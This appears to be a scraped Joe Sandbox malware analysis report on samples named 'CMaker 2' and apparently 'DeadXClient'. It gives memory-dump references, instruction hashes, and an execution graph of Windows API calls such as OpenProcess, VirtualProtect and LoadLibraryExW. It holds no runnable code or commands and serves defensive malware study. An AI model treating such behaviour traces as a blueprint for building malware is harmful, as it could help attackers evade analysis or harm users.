                                                                                                                                                                                  • Source File: 00000005.00000002.2264373753.00007FFD935A1000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFD935A0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2264326565.00007FFD935A0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD93623000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD93625000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD9364D000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD93658000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD93663000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264633569.00007FFD93667000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264772265.00007FFD93668000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ffd935a0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: ..\s\ssl\ssl_sess.c$SSL_SESSION_new
                                                                                                                                                                                  • API String ID: 0-402823876
                                                                                                                                                                                  • Opcode ID: 3e6586d1590c5e37fe5a7cb55c6f6f0f2fce94f93ce1c7229bf9571863312e5a
                                                                                                                                                                                  • Instruction ID: 7e347300b27b628877a27abebfaed9e67b38050173dbf4e726189983db1308b5
                                                                                                                                                                                  • Opcode Fuzzy Hash: 3e6586d1590c5e37fe5a7cb55c6f6f0f2fce94f93ce1c7229bf9571863312e5a
                                                                                                                                                                                  • Instruction Fuzzy Hash: C641D225B1878282FBA5ABE5C4B07FC22E8FF98744F84403AD90D96796DE3CE140C700
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2264373753.00007FFD935A1000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFD935A0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2264326565.00007FFD935A0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD93623000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD93625000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD9364D000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD93658000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD93663000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264633569.00007FFD93667000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264772265.00007FFD93668000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ffd935a0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Time$System$File
                                                                                                                                                                                  • String ID: gfff
                                                                                                                                                                                  • API String ID: 2838179519-1553575800
                                                                                                                                                                                  • Opcode ID: 5530e0db4563f3136961ddcacea572fb8f4abfde4476f4fcd83b7edc0dcc1c0e
                                                                                                                                                                                  • Instruction ID: c9b18f8c3b4a2b96abf0bd02bbcca2cd19d5f9d4c31ec108366997e83d48328b
                                                                                                                                                                                  • Opcode Fuzzy Hash: 5530e0db4563f3136961ddcacea572fb8f4abfde4476f4fcd83b7edc0dcc1c0e
                                                                                                                                                                                  • Instruction Fuzzy Hash: FE21C572B0468A85EBA58F69E8203797AE8EB9C794F848035DA4DD7794DE3CD540D700
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CurrentDirectory
                                                                                                                                                                                  • String ID: :
                                                                                                                                                                                  • API String ID: 1611563598-336475711
                                                                                                                                                                                  • Opcode ID: 52b5438b11414e869825b6acf0631758bdb150c62fb32d815d183be076a3aadc
                                                                                                                                                                                  • Instruction ID: 0ae4c404fa792f52f49901e8d4eec7b4ce1a4221cc8244077f93b4d1f39f11af
                                                                                                                                                                                  • Opcode Fuzzy Hash: 52b5438b11414e869825b6acf0631758bdb150c62fb32d815d183be076a3aadc
                                                                                                                                                                                  • Instruction Fuzzy Hash: E621D076A1868281EB20CF65D04427D63B1FB89B84F898179DAADC36C4EF7CE945CB50
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                  • String ID: csm
                                                                                                                                                                                  • API String ID: 2573137834-1018135373
                                                                                                                                                                                  • Opcode ID: 712c94e0b71dfeb4192b1cdcdfcedba21e043517165edae9774edb0317bea208
                                                                                                                                                                                  • Instruction ID: fbe67153f4002d970dd205161bf6df02589c3b1ee225cb0250aaa652519e4b00
                                                                                                                                                                                  • Opcode Fuzzy Hash: 712c94e0b71dfeb4192b1cdcdfcedba21e043517165edae9774edb0317bea208
                                                                                                                                                                                  • Instruction Fuzzy Hash: 07113D32618B8582EB218F15F44026977E5FB89B94F5882B0EF9D877A4EF7CD591CB00
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: DriveType_invalid_parameter_noinfo
                                                                                                                                                                                  • String ID: :
                                                                                                                                                                                  • API String ID: 2595371189-336475711
                                                                                                                                                                                  • Opcode ID: 7720afce7fc7e91d22e9568d01b70dcbdfe4efe47a81c0f43b4b432c02103839
                                                                                                                                                                                  • Instruction ID: e1c323294f1923bcc1d7599522ec416e0c48527dfaff9124c543c5eabf648324
                                                                                                                                                                                  • Opcode Fuzzy Hash: 7720afce7fc7e91d22e9568d01b70dcbdfe4efe47a81c0f43b4b432c02103839
                                                                                                                                                                                  • Instruction Fuzzy Hash: E1018FA5A1C60286FB30EF60A46127E63B0EF49704FC6A079D56DC66C5FE3CE6049B18
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2264373753.00007FFD935A1000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFD935A0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2264326565.00007FFD935A0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD93623000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD93625000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD9364D000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD93658000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD93663000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264633569.00007FFD93667000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264772265.00007FFD93668000.00000004.00000001.01000000.00000012.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ffd935a0000_CMaker 2.jbxd
Similarity
• API ID: Time$System$File
• String ID: gfff
• API String ID: 2838179519-1553575800
• Opcode ID: 67d5b2b245d6d65e2ef5cc5c305487d292cfc8c0b311219f02d73a446867e23b
• Instruction ID: 07c5c396400cef2fd1bc761103a496f814b7ef9e053d1348db9ffcc73011a64e
• Opcode Fuzzy Hash: 67d5b2b245d6d65e2ef5cc5c305487d292cfc8c0b311219f02d73a446867e23b
• Instruction Fuzzy Hash: 8F01D6E2B1864582EF60DFA9F81115967A4EBCC798B449032E65ECBB65EE3CD241CB00

Execution Graph

Execution Coverage: 9.8%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 0%
Total number of Nodes: 1109
Total number of Limit Nodes: 3
11423->11424 11425 1c59b9f8 __free_lconv_mon 13 API calls 11423->11425 11426 1c59b9f8 __free_lconv_mon 13 API calls 11424->11426 11425->11423 11426->11427 11427->11416 10122 1c59b980 10127 1c59b991 _set_errno_from_matherr 10122->10127 10123 1c59b9e2 10132 1c59b960 10123->10132 10124 1c59b9c6 HeapAlloc 10125 1c59b9e0 10124->10125 10124->10127 10127->10123 10127->10124 10129 1c599e44 10127->10129 10135 1c599e74 10129->10135 10141 1c59b4c4 GetLastError 10132->10141 10134 1c59b969 10134->10125 10140 1c59aebc EnterCriticalSection 10135->10140 10142 1c59b4eb 10141->10142 10143 1c59b4e6 10141->10143 10147 1c59b4f3 SetLastError 10142->10147 10168 1c59d728 10142->10168 10164 1c59d6e0 10143->10164 10147->10134 10151 1c59b53f 10154 1c59d728 _set_errno_from_matherr 6 API calls 10151->10154 10152 1c59b52f 10153 1c59d728 _set_errno_from_matherr 6 API calls 10152->10153 10156 1c59b536 10153->10156 10155 1c59b547 10154->10155 10157 1c59b54b 10155->10157 10158 1c59b55d 10155->10158 10180 1c59b9f8 10156->10180 10159 1c59d728 _set_errno_from_matherr 6 API calls 10157->10159 10185 1c59b0b4 10158->10185 10159->10156 10190 1c59d3ec 10164->10190 10169 1c59d3ec try_get_function 5 API calls 10168->10169 10170 1c59d756 10169->10170 10171 1c59d768 TlsSetValue 10170->10171 10172 1c59b50e 10170->10172 10171->10172 10172->10147 10173 1c59b980 10172->10173 10178 1c59b991 _set_errno_from_matherr 10173->10178 10174 1c59b9e2 10177 1c59b960 _set_errno_from_matherr 12 API calls 10174->10177 10175 1c59b9c6 HeapAlloc 10176 1c59b521 10175->10176 10175->10178 10176->10151 10176->10152 10177->10176 10178->10174 10178->10175 10179 1c599e44 _set_errno_from_matherr 2 API calls 10178->10179 10179->10178 10181 1c59b9fd HeapFree 10180->10181 10182 1c59ba2f 10180->10182 10181->10182 10183 1c59ba18 10181->10183 10182->10147 10184 1c59b960 _set_errno_from_matherr 12 API calls 10183->10184 10184->10182 10199 1c59af8c 10185->10199 10191 1c59d44d TlsGetValue 10190->10191 10197 1c59d448 try_get_function 10190->10197 
10192 1c59d530 10192->10191 10194 1c59d53e GetProcAddress 10192->10194 10193 1c59d47c LoadLibraryExW 10195 1c59d49d GetLastError 10193->10195 10193->10197 10194->10191 10195->10197 10196 1c59d515 FreeLibrary 10196->10197 10197->10191 10197->10192 10197->10193 10197->10196 10198 1c59d4d7 LoadLibraryExW 10197->10198 10198->10197 10211 1c59aebc EnterCriticalSection 10199->10211 10535 1c594000 10536 1c593f4d _invalid_parameter_noinfo 10535->10536 10537 1c593f9d VirtualQuery 10536->10537 10538 1c593fb7 10536->10538 10539 1c594002 GetLastError 10536->10539 10537->10536 10537->10538 10539->10536 10539->10538 10540 1c59f004 10541 1c59f023 10540->10541 10542 1c59f09c 10541->10542 10545 1c59f033 10541->10545 10548 1c598620 10542->10548 10546 1c597d60 _handle_error 8 API calls 10545->10546 10547 1c59f092 10546->10547 10551 1c598634 IsProcessorFeaturePresent 10548->10551 10552 1c59864b 10551->10552 10557 1c5986d0 RtlCaptureContext RtlLookupFunctionEntry 10552->10557 10558 1c598700 RtlVirtualUnwind 10557->10558 10559 1c59865f 10557->10559 10558->10559 10560 1c598518 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 10559->10560 10870 1c59b184 10871 1c59b189 10870->10871 10875 1c59b19e 10870->10875 10876 1c59b1a4 10871->10876 10877 1c59b1ee 10876->10877 10878 1c59b1e6 10876->10878 10880 1c59b9f8 __free_lconv_mon 13 API calls 10877->10880 10879 1c59b9f8 __free_lconv_mon 13 API calls 10878->10879 10879->10877 10881 1c59b1fb 10880->10881 10882 1c59b9f8 __free_lconv_mon 13 API calls 10881->10882 10883 1c59b208 10882->10883 10884 1c59b9f8 __free_lconv_mon 13 API calls 10883->10884 10885 1c59b215 10884->10885 10886 1c59b9f8 __free_lconv_mon 13 API calls 10885->10886 10887 1c59b222 10886->10887 10888 1c59b9f8 __free_lconv_mon 13 API calls 10887->10888 10889 1c59b22f 10888->10889 10890 1c59b9f8 __free_lconv_mon 13 API calls 10889->10890 10891 1c59b23c 10890->10891 10892 1c59b9f8 __free_lconv_mon 13 API calls 10891->10892 10893 1c59b249 10892->10893 
10894 1c59b9f8 __free_lconv_mon 13 API calls 10893->10894 10895 1c59b259 10894->10895 10896 1c59b9f8 __free_lconv_mon 13 API calls 10895->10896 10897 1c59b269 10896->10897 10902 1c59b054 10897->10902 10916 1c59aebc EnterCriticalSection 10902->10916 10918 1c59d984 GetProcessHeap 11629 1c59ab04 11630 1c59ab1d 11629->11630 11631 1c59ab35 11629->11631 11630->11631 11632 1c59b9f8 __free_lconv_mon 13 API calls 11630->11632 11632->11631 11664 1c592b84 11666 1c592be1 11664->11666 11665 1c592bfc 11666->11665 11667 1c5934ac 3 API calls 11666->11667 11667->11665 10851 1c59a13b 10854 1c59ac20 10851->10854 10855 1c59b348 33 API calls 10854->10855 10856 1c59ac29 10855->10856 10857 1c59acb4 33 API calls 10856->10857 10858 1c59ac3f 10857->10858 11633 1c597f3c 11634 1c597f60 __scrt_acquire_startup_lock 11633->11634 11635 1c599eb9 11634->11635 11636 1c59b4c4 _set_errno_from_matherr 13 API calls 11634->11636 11637 1c599ee2 11636->11637 10561 1c598430 10564 1c599538 10561->10564 10563 1c598459 10565 1c59958e __std_exception_destroy 10564->10565 10566 1c599559 10564->10566 10565->10563 10566->10565 10568 1c59ac54 10566->10568 10569 1c59ac6b 10568->10569 10570 1c59ac61 10568->10570 10571 1c59b960 _set_errno_from_matherr 13 API calls 10569->10571 10570->10569 10572 1c59ac86 10570->10572 10576 1c59ac72 10571->10576 10574 1c59ac7e 10572->10574 10575 1c59b960 _set_errno_from_matherr 13 API calls 10572->10575 10573 1c59b840 _invalid_parameter_noinfo 30 API calls 10573->10574 10574->10565 10575->10576 10576->10573 10611 1c5930b0 10612 1c5930e0 10611->10612 10613 1c593199 10612->10613 10614 1c5930fd PdhGetCounterInfoW 10612->10614 10614->10613 10615 1c59311b GetProcessHeap HeapAlloc PdhGetCounterInfoW 10614->10615 10616 1c59314d StrCmpW 10615->10616 10617 1c593185 GetProcessHeap HeapFree 10615->10617 10616->10617 10619 1c593162 10616->10619 10617->10613 10619->10617 10620 1c593558 StrCmpNW 10619->10620 10621 1c593586 StrStrW 10620->10621 10622 1c5935f6 10620->10622 10621->10622 10623 1c59359f 
StrToIntW 10621->10623 10622->10619 10623->10622 10624 1c5935c7 10623->10624 10624->10622 10630 1c591934 OpenProcess 10624->10630 10627 1c593c70 StrCmpNIW 10628 1c5935e8 10627->10628 10628->10622 10629 1c591bf4 2 API calls 10628->10629 10629->10622 10631 1c591968 K32GetModuleFileNameExW 10630->10631 10632 1c5919ba 10630->10632 10633 1c5919b1 CloseHandle 10631->10633 10634 1c591982 PathFindFileNameW lstrlenW 10631->10634 10632->10622 10632->10627 10633->10632 10634->10633 10635 1c5919a0 StrCpyW 10634->10635 10635->10633 11428 1c597eb0 11429 1c597eb9 __scrt_acquire_startup_lock 11428->11429 11431 1c597ebd 11429->11431 11432 1c59a500 11429->11432 11433 1c59a520 11432->11433 11442 1c59a537 11432->11442 11434 1c59a528 11433->11434 11435 1c59a53e 11433->11435 11436 1c59b960 _set_errno_from_matherr 13 API calls 11434->11436 11437 1c59cd58 43 API calls 11435->11437 11438 1c59a52d 11436->11438 11439 1c59a543 11437->11439 11440 1c59b840 _invalid_parameter_noinfo 30 API calls 11438->11440 11463 1c59c510 GetModuleFileNameW 11439->11463 11440->11442 11442->11431 11446 1c59a4a0 13 API calls 11447 1c59a5ad 11446->11447 11448 1c59a5cd 11447->11448 11449 1c59a5b5 11447->11449 11451 1c59a2e0 33 API calls 11448->11451 11450 1c59b960 _set_errno_from_matherr 13 API calls 11449->11450 11452 1c59a5ba 11450->11452 11456 1c59a5e9 11451->11456 11453 1c59b9f8 __free_lconv_mon 13 API calls 11452->11453 11453->11442 11454 1c59a5ef 11455 1c59b9f8 __free_lconv_mon 13 API calls 11454->11455 11455->11442 11456->11454 11457 1c59a61b 11456->11457 11458 1c59a634 11456->11458 11459 1c59b9f8 __free_lconv_mon 13 API calls 11457->11459 11460 1c59b9f8 __free_lconv_mon 13 API calls 11458->11460 11461 1c59a624 11459->11461 11460->11454 11462 1c59b9f8 __free_lconv_mon 13 API calls 11461->11462 11462->11442 11464 1c59c56a 11463->11464 11465 1c59c556 GetLastError 11463->11465 11466 1c59ad0c 33 API calls 11464->11466 11467 1c59b8f0 13 API calls 11465->11467 11468 1c59c598 11466->11468 11473 1c59c563 
11467->11473 11470 1c59d614 5 API calls 11468->11470 11474 1c59c5a9 11468->11474 11469 1c597d60 _handle_error 8 API calls 11471 1c59a55a 11469->11471 11470->11474 11475 1c59a2e0 11471->11475 11473->11469 11481 1c59c3fc 11474->11481 11477 1c59a31e 11475->11477 11479 1c59a384 11477->11479 11495 1c59d108 11477->11495 11478 1c59a473 11478->11446 11479->11478 11480 1c59d108 33 API calls 11479->11480 11480->11479 11482 1c59c439 11481->11482 11484 1c59c420 11481->11484 11483 1c59d1a0 WideCharToMultiByte 11482->11483 11490 1c59c43e 11482->11490 11485 1c59c491 11483->11485 11484->11473 11487 1c59c498 GetLastError 11485->11487 11489 1c59c4c1 11485->11489 11485->11490 11486 1c59b960 _set_errno_from_matherr 13 API calls 11486->11484 11488 1c59b8f0 13 API calls 11487->11488 11491 1c59c4a5 11488->11491 11492 1c59d1a0 WideCharToMultiByte 11489->11492 11490->11484 11490->11486 11494 1c59b960 _set_errno_from_matherr 13 API calls 11491->11494 11493 1c59c4e8 11492->11493 11493->11484 11493->11487 11494->11484 11496 1c59d090 11495->11496 11497 1c59ad0c 33 API calls 11496->11497 11498 1c59d0b4 11497->11498 11498->11477 11499 1c5a16ab 11500 1c5a16eb 11499->11500 11501 1c5a1950 11499->11501 11500->11501 11503 1c5a1932 11500->11503 11504 1c5a171f 11500->11504 11502 1c5a1946 11501->11502 11506 1c5a2230 _log10_special 22 API calls 11501->11506 11507 1c5a2230 11503->11507 11506->11502 11510 1c5a2250 11507->11510 11511 1c5a226a 11510->11511 11512 1c5a224b 11511->11512 11514 1c5a2094 11511->11514 11512->11502 11515 1c5a20d4 _handle_error 11514->11515 11517 1c5a2140 _handle_error 11515->11517 11525 1c5a2350 11515->11525 11518 1c5a217d 11517->11518 11519 1c5a214d 11517->11519 11532 1c5a2688 11518->11532 11528 1c5a1f70 11519->11528 11522 1c5a217b _handle_error 11523 1c597d60 _handle_error 8 API calls 11522->11523 11524 1c5a21a5 11523->11524 11524->11512 11538 1c5a2378 11525->11538 11529 1c5a1fb4 _handle_error 11528->11529 11530 1c5a1fc9 11529->11530 11531 1c5a2688 _set_errno_from_matherr 13 API 
calls 11529->11531 11530->11522 11531->11530 11533 1c5a2691 11532->11533 11534 1c5a26a6 11532->11534 11535 1c5a269e 11533->11535 11537 1c59b960 _set_errno_from_matherr 13 API calls 11533->11537 11536 1c59b960 _set_errno_from_matherr 13 API calls 11534->11536 11535->11522 11536->11535 11537->11535 11539 1c5a23b7 _raise_exc _clrfp 11538->11539 11540 1c5a25cc RaiseException 11539->11540 11541 1c5a2372 11540->11541 11541->11517 11668 1c59dba8 11679 1c59aebc EnterCriticalSection 11668->11679 10636 1c595cac 10637 1c595cb3 10636->10637 10638 1c595ce0 VirtualProtect 10637->10638 10640 1c595bf0 10637->10640 10639 1c595d09 GetLastError 10638->10639 10638->10640 10639->10640 11542 1c59aaac 11545 1c59a878 11542->11545 11552 1c59a840 11545->11552 11550 1c59a7fc 13 API calls 11551 1c59a8a0 11550->11551 11553 1c59a850 11552->11553 11554 1c59a855 11552->11554 11555 1c59a7fc 13 API calls 11553->11555 11556 1c59a85c 11554->11556 11555->11554 11557 1c59a86c 11556->11557 11558 1c59a871 11556->11558 11559 1c59a7fc 13 API calls 11557->11559 11558->11550 11559->11558 11560 1c5a2aaf 11561 1c5a2ac7 11560->11561 11567 1c5a2b32 11560->11567 11561->11567 11568 1c59977c 11561->11568 11564 1c59977c 42 API calls 11565 1c5a2b29 11564->11565 11566 1c59ac20 33 API calls 11565->11566 11566->11567 11569 1c599798 9 API calls 11568->11569 11570 1c599785 11569->11570 11571 1c59978a 11570->11571 11572 1c59acb4 33 API calls 11570->11572 11571->11564 11573 1c599794 11572->11573 11680 1c592fa0 11682 1c592fc7 11680->11682 11681 1c593094 11682->11681 11683 1c592fe4 PdhGetCounterInfoW 11682->11683 11683->11681 11684 1c593006 GetProcessHeap HeapAlloc PdhGetCounterInfoW 11683->11684 11685 1c593038 StrCmpW 11684->11685 11686 1c593080 GetProcessHeap HeapFree 11684->11686 11685->11686 11688 1c59304d 11685->11688 11686->11681 11687 1c593558 12 API calls 11687->11688 11688->11686 11688->11687 10641 1c5a1ca0 10642 1c5a1cb1 CloseHandle 10641->10642 10643 1c5a1cb7 10641->10643 10642->10643

Control-flow Graph

Strings
Memory Dump Source
• Source File: 00000006.00000002.3508476855.00007FFD344F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ffd344f0000_DeadXClient.jbxd
Similarity
• API ID:
• String ID: SAM_^
• API String ID: 0-3658645246
• Opcode ID: 619595417986121512a315d21122e530da8b143682494209507da3141613d58d
• Instruction ID: d8c11bb5cfd8bd9c157b37fce0256b73989a74a049b4739bc7feedda59f4cfb0
• Opcode Fuzzy Hash: 619595417986121512a315d21122e530da8b143682494209507da3141613d58d
• Instruction Fuzzy Hash: 6D32C561B28A494FE7A8FB6C84B67B977D2FF99300F540579E04EC32C6DE68AC018741

Control-flow Graph

control_flow_graph 210 7ffd344f7146-7ffd344f7153 211 7ffd344f7155-7ffd344f715d 210->211 212 7ffd344f715e-7ffd344f7227 210->212 211->212 216 7ffd344f7229-7ffd344f7232 212->216 217 7ffd344f7293 212->217 216->217 218 7ffd344f7234-7ffd344f7240 216->218 219 7ffd344f7295-7ffd344f72ba 217->219 220 7ffd344f7279-7ffd344f7291 218->220 221 7ffd344f7242-7ffd344f7254 218->221 226 7ffd344f72bc-7ffd344f72c5 219->226 227 7ffd344f7326 219->227 220->219 222 7ffd344f7258-7ffd344f726b 221->222 223 7ffd344f7256 221->223 222->222 225 7ffd344f726d-7ffd344f7275 222->225 223->222 225->220 226->227 229 7ffd344f72c7-7ffd344f72d3 226->229 228 7ffd344f7328-7ffd344f73d0 227->228 240 7ffd344f73d2-7ffd344f73dc 228->240 241 7ffd344f743e 228->241 230 7ffd344f730c-7ffd344f7324 229->230 231 7ffd344f72d5-7ffd344f72e7 229->231 230->228 233 7ffd344f72eb-7ffd344f72fe 231->233 234 7ffd344f72e9 231->234 233->233 235 7ffd344f7300-7ffd344f7308 233->235 234->233 235->230 240->241 243 7ffd344f73de-7ffd344f73eb 240->243 242 7ffd344f7440-7ffd344f7469 241->242 250 7ffd344f746b-7ffd344f7476 242->250 251 7ffd344f74d3 242->251 244 7ffd344f7424-7ffd344f743c 243->244 245 7ffd344f73ed-7ffd344f73ff 243->245 244->242 246 7ffd344f7403-7ffd344f7416 245->246 247 7ffd344f7401 245->247 246->246 249 7ffd344f7418-7ffd344f7420 246->249 247->246 249->244 250->251 253 7ffd344f7478-7ffd344f7486 250->253 252 7ffd344f74d5-7ffd344f7566 251->252 261 7ffd344f756c-7ffd344f757b 252->261 254 7ffd344f7488-7ffd344f749a 253->254 255 7ffd344f74bf-7ffd344f74d1 253->255 257 7ffd344f749c 254->257 258 7ffd344f749e-7ffd344f74b1 254->258 255->252 257->258 258->258 259 7ffd344f74b3-7ffd344f74bb 258->259 259->255 262 7ffd344f7583-7ffd344f75e8 call 7ffd344f7604 261->262 263 7ffd344f757d 261->263 270 7ffd344f75ea 262->270 271 7ffd344f75ef-7ffd344f7603 262->271 263->262 270->271
Memory Dump Source
• Source File: 00000006.00000002.3508476855.00007FFD344F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ffd344f0000_DeadXClient.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c2969127fd89227e33ffba8486d0229c945ebfaf6d3dc1670d4202c713e595a0
• Instruction ID: 4ed6b0166c6d625c4c9787e24bb5f796988515edfaa0504ff13247f91463c11e
• Opcode Fuzzy Hash: c2969127fd89227e33ffba8486d0229c945ebfaf6d3dc1670d4202c713e595a0
• Instruction Fuzzy Hash: 25F1A531A08A8D8FEBA8DF28C8557E977E1FF55310F04427EE84DC7695CB78A8458B81

Control-flow Graph

